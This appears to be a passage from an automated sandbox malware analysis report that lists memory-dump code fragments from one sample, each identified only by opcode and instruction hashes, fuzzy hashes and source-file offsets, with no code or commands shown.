                                        • Opcode ID: aef27ff796044c49dfa67f7c5c23bb49c5655fccbc4e7cd1f02c3ffb9da5a6a6
                                        • Instruction ID: 99b0d2714940ea49d330d091a79d95a89cf49387d91b93adcaca609ab9effc68
                                        • Opcode Fuzzy Hash: aef27ff796044c49dfa67f7c5c23bb49c5655fccbc4e7cd1f02c3ffb9da5a6a6
                                        • Instruction Fuzzy Hash: 7FA14C346406018FCB05EF68D58495ABBF2FF893107158AA9D45A8B776DB30FD8ACF90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3fad774e60b8b448c67214d3d42de1d23e70fe6610af32534439261a9ec6a9be
                                        • Instruction ID: f143a715a35f03211639db0f25b219d9278c636cb586c1fb57834adfaeae198b
                                        • Opcode Fuzzy Hash: 3fad774e60b8b448c67214d3d42de1d23e70fe6610af32534439261a9ec6a9be
                                        • Instruction Fuzzy Hash: 60816F75B002198FCB45DF68D5849AEBBF2FF89314B1580AAE915DB361D730EC86CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07f0a34d138a5c078101bc4597e6049990e4c97f3a183a0b94c5e4d8ceec28a2
                                        • Instruction ID: f3c7751c4d308aa8bf1fd2ab20fab43170f5f1e9bd617bd3bd25c404d5b6ce5d
                                        • Opcode Fuzzy Hash: 07f0a34d138a5c078101bc4597e6049990e4c97f3a183a0b94c5e4d8ceec28a2
                                        • Instruction Fuzzy Hash: A5617D307442048FC758DB79C498A2A7BE6EFC9614B1584EAE246CB3B2CF71DC86CB50
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 60aa17a0a880e7c973ede875c0c176687a12070fe75d5babfdd8ab7906e09fe1
                                        • Instruction ID: 260da783fffe1dadd31bc7c4d3af1602119c6be9e24e5888ec24a1a48599bcd0
                                        • Opcode Fuzzy Hash: 60aa17a0a880e7c973ede875c0c176687a12070fe75d5babfdd8ab7906e09fe1
                                        • Instruction Fuzzy Hash: EA614E30B006158FCB55DF69C5546AEBBF6FF8C604B1484AAD905EB369EB30DC46CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d12bb564dc09b6c36f9eaddb4c81af7430cdad68d714a039a7f800198a70d04
                                        • Instruction ID: 16b27a9b73183de2e4276c435a5f7f210497137bbfa5c4d7b594bd61ea04e0cd
                                        • Opcode Fuzzy Hash: 3d12bb564dc09b6c36f9eaddb4c81af7430cdad68d714a039a7f800198a70d04
                                        • Instruction Fuzzy Hash: C0517F75B002058FCB44DF79D58499ABBF6EF88310B1584EAD609DB361DB30EC49CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 230f42ec06758740432606286c975e0f2dd47c13f6aa4d6567ae8d2552c543f1
                                        • Instruction ID: 552b0bf9c63b6e0a4a95ff0982467db3c922ae5bfa6fcff5517e98887461e396
                                        • Opcode Fuzzy Hash: 230f42ec06758740432606286c975e0f2dd47c13f6aa4d6567ae8d2552c543f1
                                        • Instruction Fuzzy Hash: F4518D316406009FC715EB34E59866EBBE3EF86344B1489ADD0468B7A5DF35EC4ACB50
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a5b5265760f0e34b47042fdbc86a3e96a8e9e4f8c19ea44a50d4e1796c231073
                                        • Instruction ID: 809bc4a3eba1f63981f5358d81c26d9a945326e9672331b35acde5fc782a24f7
                                        • Opcode Fuzzy Hash: a5b5265760f0e34b47042fdbc86a3e96a8e9e4f8c19ea44a50d4e1796c231073
                                        • Instruction Fuzzy Hash: F54102327007418FCB25DB29D54466BBFE6EFC5354B1488AAD94A8B752DB30EC49CBA0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d2794c4df760c8bb54700ea53c3d043fa2584b126f604dc9efc0047f4f8428a
                                        • Instruction ID: 72947c1db16f29159ac42b96bddb9cf7af046c83fb21304d2dd93d10e925477f
                                        • Opcode Fuzzy Hash: 0d2794c4df760c8bb54700ea53c3d043fa2584b126f604dc9efc0047f4f8428a
                                        • Instruction Fuzzy Hash: F2415D31A002058FCB14DB58D984AAFFBF2EF84310F18C5A9D5199B365DB71ED4ACB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 53733036b02ba2c35d1c107121891e582ea800c173aa9592a85a82f865dea92a
                                        • Instruction ID: 96eaf13300a029a7aa137c018ececb870299db570c3d57922979236904d5b043
                                        • Opcode Fuzzy Hash: 53733036b02ba2c35d1c107121891e582ea800c173aa9592a85a82f865dea92a
                                        • Instruction Fuzzy Hash: FE41F6327056508FC721DB29D48095BBBF6EF8532431989FADA99CB756DB30EC09CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c8a5beb47f8a4e8369ead2318d13aa0fc69a0df347a234f1470aa4987cac7e03
                                        • Instruction ID: bb44989e0fe68dbade595457a0eed80508bbbf5b7543201552e02b5c827d36af
                                        • Opcode Fuzzy Hash: c8a5beb47f8a4e8369ead2318d13aa0fc69a0df347a234f1470aa4987cac7e03
                                        • Instruction Fuzzy Hash: 83416A316406009FC715EB34E558A2EBBE3EF89344B148A6CD04A8B7A5DF75EC4ACB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c0219ee275bf2be423848f3977fdd8c2b69a1aea69776533fd2e59331ad4c827
                                        • Instruction ID: 92deea14ff095fd08786e11d05065aef3c6804bfe56240dd02f2324e168832f3
                                        • Opcode Fuzzy Hash: c0219ee275bf2be423848f3977fdd8c2b69a1aea69776533fd2e59331ad4c827
                                        • Instruction Fuzzy Hash: AE412D70A0021A9FDB44DFA8C940AAEFBF2FF88304F158595D609AB355DB34D945CFA0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 28161e27fd8aadbfa12465c667c489334d6824e3cdaa5bb80ec5f4b2f66a34bd
                                        • Instruction ID: 1d211602465af28f2b074b0aad908ce0cb59b865db25663ac09a7026fb4ff05d
                                        • Opcode Fuzzy Hash: 28161e27fd8aadbfa12465c667c489334d6824e3cdaa5bb80ec5f4b2f66a34bd
                                        • Instruction Fuzzy Hash: 4B413B306007006FD315EB25E940B5ABBE2EF81310F44CAADC15A8BBA5DB74AD89CB91
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49ca35de715c34f044fc5b928e075aecbc31b03924136f575c1c7da269b36eed
                                        • Instruction ID: 2212293c72a355d9060d8d9c7de914331ecc173a24a07a20b70574ff6df979ab
                                        • Opcode Fuzzy Hash: 49ca35de715c34f044fc5b928e075aecbc31b03924136f575c1c7da269b36eed
                                        • Instruction Fuzzy Hash: 464139306007006FD315FB25E940B5ABBE2EF81310F44CAA9D15A8BB65DB74FD89CB91
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 058a248ddfa5e6ce348324de05ee1e70a31f973eb21723701e0969fc3db1a320
                                        • Instruction ID: d3bb62beade79fe8e37ed8fc0fbc1c2dba0a3fd7afc2713babc0fa9c4aeff8f7
                                        • Opcode Fuzzy Hash: 058a248ddfa5e6ce348324de05ee1e70a31f973eb21723701e0969fc3db1a320
                                        • Instruction Fuzzy Hash: 75419F7970424A8FC741CF28D49096AFFB1FF8A21471986DAD954DB652D730EC99CBC0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be846b0c59bd83e3d542ca9d181e20f1b9b514ce76f26ac95f2074f93f0c2fd4
                                        • Instruction ID: 2208c4c75ed3385a0774745e0f1ea6c39a442bcd675018d3a85322cd09f48c2d
                                        • Opcode Fuzzy Hash: be846b0c59bd83e3d542ca9d181e20f1b9b514ce76f26ac95f2074f93f0c2fd4
                                        • Instruction Fuzzy Hash: 3D410835B041099FCB55DF68C58896ABFF1EF89214B1580DAE945DB372DB30EC85CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07a1320709f1b4418a8da418bd38f9b100d6088ece5b8113f36abb04a66c4984
                                        • Instruction ID: b5d514c4dd4d1c1f88fc55e44daf39aa01d402d8de1353bfa67d0b3bab4eb835
                                        • Opcode Fuzzy Hash: 07a1320709f1b4418a8da418bd38f9b100d6088ece5b8113f36abb04a66c4984
                                        • Instruction Fuzzy Hash: 5531AD35B40251AFCB45DF38D884A6EBBB2FF89300B1084A9E905CB765DB31ED56CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a29398334eba765e402db7c586a432953a00c4f7798bea5c71ca78fb0faea951
                                        • Instruction ID: abd1ebfdee04f2a482a910eedf44d7ff6f8c5efd20f82f21bec57c3ea3829122
                                        • Opcode Fuzzy Hash: a29398334eba765e402db7c586a432953a00c4f7798bea5c71ca78fb0faea951
                                        • Instruction Fuzzy Hash: E0316D34B401048FD759EB7989A473E7AE3EBCC74175888A8E50EDB398DE359D478B80
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 67d7bd5f923c6a023b3887cc52c2e9d0829fda5cf4051089c39f602f34a38555
                                        • Instruction ID: 93a21f3ab8ec263511c9a700a506b7998ad7a6de65b8b190100be5bdbb6bed5e
                                        • Opcode Fuzzy Hash: 67d7bd5f923c6a023b3887cc52c2e9d0829fda5cf4051089c39f602f34a38555
                                        • Instruction Fuzzy Hash: 17318F34B401004FC759EB7989A433E7AE3EBCC75075488A8E50ADB398DE359C478B80
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bbc1db7b731d64bf7e44a20da722fe007cff26f075b2c978fda8a4d464b90040
                                        • Instruction ID: 6546189486749bcaedd44a92fd3553d085228552a5883350c2d3942c7348fbbb
                                        • Opcode Fuzzy Hash: bbc1db7b731d64bf7e44a20da722fe007cff26f075b2c978fda8a4d464b90040
                                        • Instruction Fuzzy Hash: 2A318435B002049FC708EF79C454A6EB7F6FF89710B2485AAE959DB360CB359C46CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b79bc31836b72e684e89d365d8deabbf8a23d251c39a8c0b405a6743df32c8e
                                        • Instruction ID: fab36b4ca419080be796a7086524e2959a1324ec9da74394720b72319b6b68fb
                                        • Opcode Fuzzy Hash: 7b79bc31836b72e684e89d365d8deabbf8a23d251c39a8c0b405a6743df32c8e
                                        • Instruction Fuzzy Hash: 41217E31B403006FE319AA31A86573F6753EBC1750F0889A8D9168F794DD75DD4B9784
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 449e74ee77ea758bd05a487eef6e25e883b0a9e711f8d75f06171b69e5c230dd
                                        • Instruction ID: d72f3a845628d4750177b913b5674c250372b262e12832e550fae9cf3eb2219e
                                        • Opcode Fuzzy Hash: 449e74ee77ea758bd05a487eef6e25e883b0a9e711f8d75f06171b69e5c230dd
                                        • Instruction Fuzzy Hash: 3B21D576B0015A8FDF10EFA9E4407EEBBF1EF88300F0449A9D541A729ACB355949CB60
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5dcd2f0b02b044a5691400720e1c63e440e1e290ab50bc7ee054725ac0ce21c2
                                        • Instruction ID: 3b2c5e3aa0c74ddad0b7c06ea50805d106eb6b15cff11c1ea3b68a64e0c04f22
                                        • Opcode Fuzzy Hash: 5dcd2f0b02b044a5691400720e1c63e440e1e290ab50bc7ee054725ac0ce21c2
                                        • Instruction Fuzzy Hash: 5F117231B401088BDB64AB64D45A7AEBBB6EF88751F040869D90AF3390CF754C59CB95
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b52dab5a9bffba6e1dd67b21bb802f20990c27c9e92c456eeddcd0a537e5769d
                                        • Instruction ID: 0cfa12385313548fbd4c0ee13db575278642ee67494246989f8a780b37554c83
                                        • Opcode Fuzzy Hash: b52dab5a9bffba6e1dd67b21bb802f20990c27c9e92c456eeddcd0a537e5769d
                                        • Instruction Fuzzy Hash: 5911E2717043128FCB20DF69D854A1ABBF6FF843207544A6DEA068B754DB75EC058B90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f448dadf3891759d518270ce69d030a82710c672672655f6a60010b2779b80d5
                                        • Instruction ID: 8e4633f16a5303321602699496d329d0c5f079b1de3794f06adf20a8dc189597
                                        • Opcode Fuzzy Hash: f448dadf3891759d518270ce69d030a82710c672672655f6a60010b2779b80d5
                                        • Instruction Fuzzy Hash: BB21B171A006098FCF11DF59D4C49AEFBB6FF84314B0489A9DA2997255D730E824CB50
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ffccf6a4ebd1165c60f525b188eead762942c18deb5e7b5449d481bb4f6bc63d
                                        • Instruction ID: 6178236d57d5064bc20ccd042f7dd9280e7d560b42e306c51ac21cffbefe7cd0
                                        • Opcode Fuzzy Hash: ffccf6a4ebd1165c60f525b188eead762942c18deb5e7b5449d481bb4f6bc63d
                                        • Instruction Fuzzy Hash: 8A11C462E092E55FD7129B78AC646FA7FB4EF96210B0900EBD594C7553E614840AC362
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ca594d1808ea3ecece85499e0804cf23673115f59aa7787955ab006d68c4fdb7
                                        • Instruction ID: b9d30052d0898ce6e74d6929bee2d79f7d30a0341746c6acce86aef02f96c603
                                        • Opcode Fuzzy Hash: ca594d1808ea3ecece85499e0804cf23673115f59aa7787955ab006d68c4fdb7
                                        • Instruction Fuzzy Hash: 7D116634A002049FC708EF79C458A6ABBF6FF89750F1584AAD559DB361CA359C45CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c90fa1fd13a864a4467fcd12990af00d89ad39cbf6a83b21620f7a27a048da8
                                        • Instruction ID: d01e6a599406d9d8084ffd67292a323bee5c92b61094646aa07462e816a9630c
                                        • Opcode Fuzzy Hash: 9c90fa1fd13a864a4467fcd12990af00d89ad39cbf6a83b21620f7a27a048da8
                                        • Instruction Fuzzy Hash: 2311A0717043168FCB209F69D894A2BBBF6FFC43247104A6DEA0A8B714DB75EC058B94
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 765c8c504dcc709787e0f19137fd8041d7f8dd4b1e81c925c451133e6b9d2b9b
                                        • Instruction ID: 9ccfe4943fe5f78fbe0ce5a4c1cfc5625863d12879ba802ac4b57882a61a493f
                                        • Opcode Fuzzy Hash: 765c8c504dcc709787e0f19137fd8041d7f8dd4b1e81c925c451133e6b9d2b9b
                                        • Instruction Fuzzy Hash: 0C1160316407015FC715DB28D94495ABBB2EFC13143188EAED06A8B365DB71E94BCB80
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fde983465b368a126487d5123313d72e8231158e1776677e015e936e150e9580
                                        • Instruction ID: 0f2d287a2f07277ed4d756201822f792b755623d15f97eba95a82d6df5a6efe6
                                        • Opcode Fuzzy Hash: fde983465b368a126487d5123313d72e8231158e1776677e015e936e150e9580
                                        • Instruction Fuzzy Hash: 3701C070B012406FC3099A799914726BBE6EFCA310F1440AEE60ACB385DE31DC45CBA0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 119145914df42297795750615187f6c06a1e00a8b9ddd298ac76c698943e9043
                                        • Instruction ID: 0cb430ac95094f71d99814f82e9e5bf1d5ccd60caf7e21866d0b6cac68d1748c
                                        • Opcode Fuzzy Hash: 119145914df42297795750615187f6c06a1e00a8b9ddd298ac76c698943e9043
                                        • Instruction Fuzzy Hash: C7017171B002199FCB10DAA9EC44ABFB7AAEB88611B10443AE619D3640EB319D1687A1
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2e105b1221cc32d6fdcd2c80ce7e68438be2e4832d6cdc8632ad63111717c078
                                        • Instruction ID: bcdd79cf01ce6a91129bfb8a2a7098eecb246baf15e92ef1acd6012d8f435ee9
                                        • Opcode Fuzzy Hash: 2e105b1221cc32d6fdcd2c80ce7e68438be2e4832d6cdc8632ad63111717c078
                                        • Instruction Fuzzy Hash: 140176722043594FD710AA6DD9A4BBBBFE4EF81210F0448BED546C3292C6348A4CC360
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a70032d322fe98c8ca9d9f681127adec423f7b1b2e624c9b2ea10696a1405a4
                                        • Instruction ID: 1889c39c2d50b1632bb5a3e64afca13faa6ba2834daaec017b4d3df7a5ed8f19
                                        • Opcode Fuzzy Hash: 9a70032d322fe98c8ca9d9f681127adec423f7b1b2e624c9b2ea10696a1405a4
                                        • Instruction Fuzzy Hash: 08012D726043194FD710AE5ED4947BBBBE9EB80354F04497ADA05C3292C7759D8CD360
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f43b4f60609b02a4410e275d7a405e381a6daaa6608b0711d33f92e634e0f812
                                        • Instruction ID: 2ee355114a9aa88ddf8f2f7dd5cd4d7accf9b8649cf4b80b8d79e4e30ef5fe3d
                                        • Opcode Fuzzy Hash: f43b4f60609b02a4410e275d7a405e381a6daaa6608b0711d33f92e634e0f812
                                        • Instruction Fuzzy Hash: 470113753002058FC744DB2AD884E5ABBF9EF8922071685AAE605CB332DB71EC45CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ccb0bc737714ef550cb640a4bf68fb75a67c80ed67967185e855dc4da3b21bd0
                                        • Instruction ID: 3d25076b900c730f1daa0b2e220db8ccbba60582eb6460c712513b54e99c8aa9
                                        • Opcode Fuzzy Hash: ccb0bc737714ef550cb640a4bf68fb75a67c80ed67967185e855dc4da3b21bd0
                                        • Instruction Fuzzy Hash: E91126311093828FC3229B28D5546C9FFA1DF42314F14C6EAE0994F2A7D730A84BCB41
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e39a124010bf0c41cda6fc2dbfe3cc9886e03be9a88c345fa82dc003f91b3eb
                                        • Instruction ID: fa9c56e28634f811e89c0b125061351664a3de19b1e134b6b2be27cb3b5c6700
                                        • Opcode Fuzzy Hash: 5e39a124010bf0c41cda6fc2dbfe3cc9886e03be9a88c345fa82dc003f91b3eb
                                        • Instruction Fuzzy Hash: 7701D131A0071ADFCBA8CA25D500667FBE6FB8420971588BED60286614DB71E8CCCB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01d634230357d59c1d7d6e25fe1892b12454399da04e3d5fdb6d682e611e2287
                                        • Instruction ID: fbcf296f27a4d5c3c90f1287b9262c128a4e8375d94e036e96231e4fd5f84b52
                                        • Opcode Fuzzy Hash: 01d634230357d59c1d7d6e25fe1892b12454399da04e3d5fdb6d682e611e2287
                                        • Instruction Fuzzy Hash: 7CF0E97260430A8FC710DF68E840815B7A5EF45324B8042E6EA058B368E732EC55CB90
                                        Memory Dump Source
